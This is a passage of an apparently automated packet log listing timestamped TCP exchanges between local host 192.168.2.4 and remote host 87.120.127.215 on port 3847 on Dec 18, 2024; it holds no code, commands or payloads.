                                                                                                                                                Dec 18, 2024 19:28:10.808015108 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.808079958 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.808115959 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.815059900 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.815118074 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.815133095 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.821785927 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.821881056 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.821981907 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.828875065 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.828938007 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.828939915 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.834685087 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.834738016 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.834819078 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.841056108 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.841150999 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.841157913 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.847228050 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.847292900 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.847338915 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.853440046 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.853590012 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.853615999 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.859785080 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.859880924 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.859910011 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.865947008 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.866017103 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.866091013 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.872273922 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.872395039 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.872457981 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.878456116 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.878572941 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.878597975 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.886517048 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.886598110 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.886657000 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.891068935 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.891139984 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.891216993 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.897216082 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.897284985 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.897357941 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.903501987 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.903620005 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.903759003 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.909461021 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.909516096 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.909526110 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.915441990 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.915577888 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.915600061 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.921346903 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.921432972 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.956530094 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.956617117 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.956957102 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.958962917 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.959139109 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.959213972 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.963193893 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.964749098 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.964890957 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.964906931 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.969201088 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.969275951 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.969327927 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.973817110 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.973920107 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.973956108 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.977916002 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.978041887 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.978086948 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.981977940 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.982078075 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.985558987 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.985981941 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.986027956 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.986048937 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.989981890 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.990035057 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.990045071 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.993710041 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.993762970 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.993788004 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.997427940 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:10.997473001 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:10.997555017 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.001171112 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.001213074 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.001224041 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.004729986 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.004779100 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.004793882 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.008254051 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.008308887 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.008311987 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.011805058 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.011859894 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.011898041 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.015331984 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.015412092 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.015445948 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.018821955 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.018872023 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.018924952 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.022248983 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.022346973 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.022454977 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.025684118 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.025734901 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.025753021 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.028206110 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.028280973 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.028661966 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.030391932 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.030437946 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.030523062 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.032958031 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.032998085 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.033026934 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.035149097 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.035192013 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.035193920 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.037280083 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.037327051 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.037365913 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.039594889 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.039645910 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.039674044 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.041913033 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.041961908 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.042018890 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.044198990 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.044245005 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.044285059 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.046555996 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.046606064 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.046633959 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.048780918 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.048830032 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.048892021 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.050966978 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.051017046 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.051095963 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.053203106 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.053231955 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.053261042 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.055509090 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.055521011 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.055566072 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.057832956 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.057883024 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.057918072 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.059937000 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.059983015 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.059988976 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.062140942 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.062194109 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.062299967 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.064357042 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.064409018 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.064469099 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.066615105 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.066704988 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.066739082 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.068837881 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.068893909 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.068996906 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.071166039 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.071216106 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.071260929 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.073347092 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.073471069 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.073508978 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.075505972 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.075551987 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.148612976 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.148680925 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.148725986 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.149431944 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.149854898 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.149872065 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.149894953 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.151740074 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.151778936 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.151904106 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.153666019 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.153718948 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.153758049 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.155533075 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.155577898 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.155579090 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.157392025 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.157433987 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.157505035 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.158076048 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.277545929 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.277601004 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.397073984 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.690995932 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.691009045 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.691020966 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.691035986 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.691073895 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.691124916 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.691155910 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.691231012 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.691268921 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.692326069 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.692492008 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.692529917 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.693397999 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.693411112 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.693463087 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.694626093 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.694823980 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.694864988 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.696033955 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.696053982 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.696094990 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.697276115 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.697455883 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.697495937 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.698515892 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.698700905 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.698753119 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.699971914 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.699992895 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.700028896 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.701076984 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.701273918 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.701314926 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.705068111 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.828921080 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:11.828980923 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:11.950289011 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.241373062 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.241796017 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.241897106 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.241971016 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.242691040 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.242784023 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.242945910 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.243062019 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.243285894 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.244308949 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.244364023 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.244415998 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.245093107 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.245234013 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.245286942 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.246397972 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.246553898 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.246597052 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.247747898 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.247978926 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.248018980 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.249315023 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.249586105 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.249645948 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.250513077 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.250642061 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.250693083 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.251710892 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.251825094 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.251930952 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.253019094 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.253185034 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.253232956 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.254389048 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.254525900 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.254570961 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.255661011 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.255707026 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.255790949 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.256944895 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.257065058 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.257105112 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.258280039 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.258460999 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.258507013 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.259623051 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.259906054 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.259962082 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.260936022 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.261049986 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.261096954 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.262286901 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.262300014 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.262342930 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.263540983 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.263695955 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.263833046 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.265032053 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.265091896 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.265150070 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.266212940 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.266268969 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.266369104 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.267496109 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.267676115 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.267745972 CET499583847192.168.2.487.120.127.215
                                                                                                                                                Dec 18, 2024 19:28:12.268836975 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.268850088 CET38474995887.120.127.215192.168.2.4
                                                                                                                                                Dec 18, 2024 19:28:12.268896103 CET499583847192.168.2.487.120.127.215
